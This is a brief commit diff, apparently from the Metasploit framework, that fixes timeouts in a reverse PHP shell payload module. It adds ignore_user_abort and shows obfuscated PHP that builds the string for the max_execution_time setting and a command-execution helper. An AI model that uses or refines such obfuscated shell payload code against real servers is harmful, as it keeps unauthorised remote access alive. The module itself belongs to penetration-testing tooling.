fix timeout issues in reverse php shell
git-svn-id: file:///home/svn/framework3/trunk@5461 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9c7f5d7130
commit
9019b077bd
|
@ -97,6 +97,7 @@ module ReversePhp
|
|||
$disabled=array();
|
||||
}
|
||||
@set_time_limit(0);
|
||||
@ignore_user_abort(1);
|
||||
@ini_set($m.$a.$x.$_.$e.$x.$e.$c.$u.$t.$i.$o.$n.$_.$t.$i.$m.$e,0);
|
||||
function myexec($cmd){
|
||||
global$disabled,$_,$a,$c,$e,$h,$m,$n,$o,$p,$r,$s,$t,$u,$x,$y;
|
||||
|
|
Loading…
Reference in New Issue